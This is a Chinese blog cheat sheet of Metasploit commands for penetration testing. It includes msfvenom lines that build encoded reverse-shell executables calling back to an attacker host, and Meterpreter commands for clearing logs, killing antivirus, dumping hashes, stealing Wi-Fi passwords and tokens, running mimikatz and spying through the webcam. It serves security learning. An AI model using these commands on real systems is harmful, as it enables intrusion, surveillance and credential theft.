Metasploit(最全命令讲解)

最新推荐文章于 2024-06-15 10:22:15 发布
最新推荐文章于 2024-06-15 10:22:15 发布
阅读量608 收藏 9
点赞数 12
分类专栏: 笔记 文章标签: linux 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62729556/article/details/136439794
版权
文件目录 
data目录(msf用于一些可以编辑的文件)
documentation目录(msf相关文档,工具介绍)
lib目录(静态链接库,msf中的一些代码)
modules目录(msf模块)
tools目录(msf小工具模块)
基础使用 
msfdb init:初始化,并启动数据库
msfconsole:开启msf
db_status:查看msf数据库状态
可以使用kage实现界面化
help:查看帮助
exit:退出msf
show:进行罗列模块
search:搜索模块
use:使用模块
back:返回上一级
info:查看模块信息
show options:查看配置
set:设置一个值
exploit:执行模块
jobs:查看后台工作
kill:杀死工作
threads:线程(例如设置10个线程 set threads 10)
消息收集 
arp扫描:auxiliary/scanner/discovery/arp_sweep
udp扫描:auxiliary/scanner/discovery/udp_sweep
端口扫描:auxiliary/scanner/portscan/tcp
exploit 
永恒之蓝(17-010)
msfvenom 
常用参数
msfvenom -l:查看列表
msfvenom -p:指定payload
msfvenom -f:指定输出格式
msfvenom -e:指定编码方式
msfvenom -i:指定编码次数
windowsDemo:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.174.129 LPORT=4444
-e x86/shikata_ga_nai -i 5 -f exe > 1.exe
linuxDemo: msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.174.129 LPORT=4444
-f elf > 1.elf (linux中可执行文件后缀为.elf)
Meterpreter 
基础操作
background:返回
sessions -l:查看所有会话信息
sessions -i id号:与指定的会话进行交互(id号为存在的会话 输入哪个id就可以切换到哪个会话状态下)
pwd:查看目标当前目录
lpwd:查看本地当前目录
cd:切换到目标的指定目录
lcd:切换到本地指定目录(l为localhost)
ls:列出目标的文件
lls:列出本机当前的文件
clearev:清理痕迹
download 目标文件名:将目标文件下载到本地
upload 目标文件名:将文件上传到目标
execute 参数:在目标执行命令的功能(-h功能查看有哪些参数)
execute -f 文件名(例:1.exe) -H:不显示执行情况,创建一个进程(在目标文件上执行文件,隐藏执行)
ps:列出目标进程
getuid:查看当前用户的身份
getprivs:查看当前用户的权限
migrate 进程号:进程迁移命令(权限就会成为该进程号的权限)
getpid:查看木马进程
shell:进入终端环境
(1)chcp 65001:更改编码,防止乱码(前提是进入终端环境后执行该命令)
exit:退出终端环境
idletime:查看目标服务器空闲时间
sysinfo:查看目标信息
kill pid号:杀死目标的一个进程
shutdown:关机
reboot:重启
netstat:查看网络连接情况
getsystem:尝试提权(一般低版本才可以成功,高版本需要配合其他才能成功)
信息收集 (大部分使用 run 运行) 
模块学习,可以罗列出来选择需要的模块使用
run killav:杀死杀毒软件(了解一下就行)
run hashdump:导出目标机的密码
run post/windows/wlan/wlan_profile:查看wifi密码
run vnc:实时屏幕监控
run webcam:开启一个摄像头
run post/windows/gather/checkvm:查看当前主机是否为虚拟机
run post/windows/gather/enum_computers:枚举域内的主机
run post/windows/manage/enable_rdp:开启目标的3389
run getgui -e:连接对方远程桌面
help:各种命令罗列
incognito (令牌窃取工具) 
load incognito:加载incognito工具
list_tokens -u:列出可以模拟的令牌
impersonate_token 令牌名:窃取一个指定令牌(令牌名例如:ROOT-5DE52AC98B\\Administrator,需要加俩
个\,若令牌名之间有空格,可以加"",将令牌名写入,可以试一试,不一定成功)
mimikatz 
load mimikatz:加载该工具
wdigest:抓取明文密码
msf 图形化界面 
msfdb init:开启数据库
armitage:启用图形化界面
msf 更新 
apt update;apt install metasploit-framework:更新
手动加入一些插件去exploitdb:网址https://www.exploit-db.com/

拾光人!
关注
  • 12
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
metasploit常用命令
Johnathan的博客
03-03 535
metasploit常用命令 service apache2 start service postgresql start msfconsole启动 1.MSF终端命令 show exploit 列出metasploit框架中的所有渗透攻击模块。 show payloads 列出metasploit框架中的所有攻击载荷。 show auxiliary 列出metasploit框架中的所有辅助攻击模块。 search name 查找metasploit框架中的所有渗透攻击和其他模块。
metasploit命令记录
ljj123_的博客
12-28 222
(一)、进入某模块 use (二)、先看该模块下有哪些可用命令:show -h (三)、列举攻击载荷payloads :表示该模块可用的所有攻击载荷的名称,可选择使用哪个攻击载荷 来攻击该模块, (1) 展现所有攻击 show payloads (2)设置使用哪种攻击 set payload 载荷名 (四)、设置被攻击主机或端口等和发动攻击主机IP地址 (1)...
Metasploit学习指南—基础篇
weixin_30853329的博客
03-18 148
Metasploit是一款强大的渗透测试平台,其中包括了很多渗透测试利器,本文简单介绍一下Metasploit配置和基础的使用方法,主要包括以下几个方面: Metasploit的核心 基础的配置 Metasploit的模块 Metasploit的实用工具 简介 Metasploit是一款免费的、开源的渗透测试平台,可以用于渗透测试不同的系统和框架,也可以看作是一个单独...
Metasploit (MSF) 使用-包含基本使用、payload生成、后渗透模块使用
最新发布
zzz6583zz的博客
06-15 941
l, --list <type> 列出指定模块的所有可用资源,包括:payloads,encodes,nops,all-p, --payload <payload> 指定所需要使用的payload,也可以使用自定义payload,几乎支持全平台-f, --format <format> 指定输出格式-e, --encoder <encoder> 指定需要使用的encode,指定需要使用的编码。
Metasploit使用教程
Kali与编程
03-23 1898
例如,payload/windows/meterpreter/reverse_tcp是一个Windows系统的Meterpreter反向Shell Payload,可以建立与攻击机的反向连接并提供完全的系统访问权限。Payload模块是Metasploit中最重要的模块之一,它用于实现对目标系统的控制。Metasploit支持多种不同的操作系统(Windows、Linux、MacOS等)和硬件平台(x86、ARM等),并提供了多种编程接口,包括Ruby API、Python API、Java API等。
Kali Linux 学习日记4 -Metasploit(MSF)和 Nessus
qq_46081990的博客
03-06 1275
为了利用一个vulnerability(系统存在的漏洞),通常需要一个exploit(利用漏洞的代码)。exploit可以利用vulnerability,提供目标主机的权限。exploit通常会向目标发送payload(攻击成功后向目标传递的恶意代码),以此来获取目标主机的权限。payload通常由exploit来传递到目标系统上。Metasploit是一个漏洞框架。全称为The Metasploit Framework,简称MSF。它允许使用者开发自己的漏洞脚本(ruby语言),然后进行测试。
【Nmap与Metasploit常用命令
一纸荒芜的博客
08-02 1981
nmap和metasploit
Metasploit常用命令、技术功能模块
m0_62063669的博客
08-09 873
漏洞利用是个流程性的,所有的代码都是完成这个流程,到什么地方,发多少个字节,在什么位置插入什么特殊的payload内容,进行内存的跳转,最后实现payload的执行。Exploits:利用系统漏洞进行攻击的动作,此模块对应每个具体漏洞的攻击方法(主动、被动)Payload:成功exploit之后,真正在目标系统执行的代码或指令。(正向,目标开放了一个端口,攻击者用工具连接这个端口成功)......
Metasploit会话常用命令
qq_58000413的博客
08-19 246
getdesktop 获取当前的Meterpreter桌面。getsystem 尝试将你的权限升为本地系统的权限。screenshort 获取目标桌面屏幕截图。sysinfo 获取远程系统的有关信息。ipconfig 显示网络接口信息。getlwd 显示本地工作目录。通过反弹shell获得的会话的常用命令。execute 执行命令。ps 列出正在运行的进程。edit 编辑文件。
msf命令
净邪的博客
03-08 3302
基础命令概览:back(返回): 从目前的情况下向后移动banner:Display an awesome metasploit bannercd: 改变当前的工作目录color: 切换颜色connect(远程连接): 与主机通信edit(编辑): ...
metasploit的常用命令
天元喜羊羊的博客
04-28 3036
http://www.offensive-security.com/metasploit-unleashed/Meterpreter_Basics Meterpreter Basics Since the Meterpreter provides a whole new environment, we will cover some of the basic M
metasploit 常用命令汇总
weixin_30530339的博客
12-21 221
1.连接数据并显示一些信息 db_connet username:password@ip address/database name db_destroy 同上 db_import 文件名字 db_hosts -c address,svcs,vulns // 显示ip地址,服务器,漏洞数 db_vlns // 显示漏洞名字 2.nmap扫描 db_nmap -sS...
metasploit中msf框架以及更新
qq_43613772的博客
07-08 6404
今天刚开始学习Metasploit时就遇到问题,经过反复查找最终还是没能搞定,在学长的知道下发现原来是我kali中metasplooit更新的问题。经查资料:自15年底的kali2.0版本开始,Kali团队不再使用Rapid7 提供的Metasploit Framework工具套件,而是自己重新打包发布该工具。 Rapid7在github上的实时更新很难及时同步到kali的版本上。这次我使用的是一...
常用metasploit命令
如鹿渴慕泉水的专栏
09-09 4197
-----------------------------------------openvas--------------------------------------------------------------------------------------------------------- gsad --listen=0.0.0.0 --port=5687  netstat -
Kali:Metasploit升级更新至5.0.62
weixin_38896449的博客
12-02 1054
渗透测试框架Metasploit功能众多,它可以帮助用户识别安全问题,验证漏洞的缓解措施,并对某些软件进行安全性评估,提供真正的安全风险情报。 一、安装metasploit 在kali系统使用metasploit时,启动发生故障,所以将其卸载重装 apt-get remove metasploit-framework apt-get install metasploit-framework 重装...
kali下的Metasploit升级更新至5.0.62
zb0567的专栏
06-15 3186
apt-get remove metasploit-framework apt-get install metasploit-framework 但是会出现各种问题 重装失败,显示找不到需要的软件,更换source源后重新安装。 vim /etc/apt/sources.list 添加这两行(任选) #中科大 deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib deb-src http://mirrors.u
Metasploit用户接口(MSF终端、MSF命令行、Armitage)
WEL测试
08-29 5906
2.2Metasploit用户接口          Metasploit软件为它基础功能提供了多个用户接口,包括终端、命令行、图像化界面等。除了这些接口,功能程序(utilities)则提供了对Metasploit框架中内部功能的直接访问。 2.2.1 MSF终端          MSF终端(msfconsole)是目前Metasploit框架最为流行的用户接口,而且MSF终端是Met
linux查看msf安装目录,Ubuntu下安装MetasploitLinux命令大全
weixin_36397509的博客
04-29 817
①下载Metasploit下的Linux安装包,拷贝至Ubunto的/opt目录。②在Terminal下运行命令“chmod +x /opt/framework-linux-4.0.0.run”③在Terminal下运行命令“sudo /opt/framework-linux-4.0.0.run”,选择安装目录进行安装。④将Metasploit升级至最新版本,运行命令“sudo svn updat...
metasploit命令
05-31
Metasploit是一个开源的漏洞测试框架,可以帮助安全研究人员和渗透测试人员快速找到和利用目标系统上的漏洞。以下是几个常用的Metasploit命令: 1. `msfconsole`:启动Metasploit控制台。 2. `search`:搜索漏洞利用模块。 3. `use`:选择要使用的漏洞利用模块。 4. `set`:设置漏洞利用模块的参数。 5. `show options`:查看当前漏洞利用模块的选项。 6. `exploit`:执行攻击并尝试利用漏洞。 7. `sessions`:查看当前的会话列表。 8. `sysinfo`:获取目标系统的基本信息。 9. `meterpreter`:进入Meterpreter会话并执行操作。 10. `exit`:退出Metasploit控制台。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值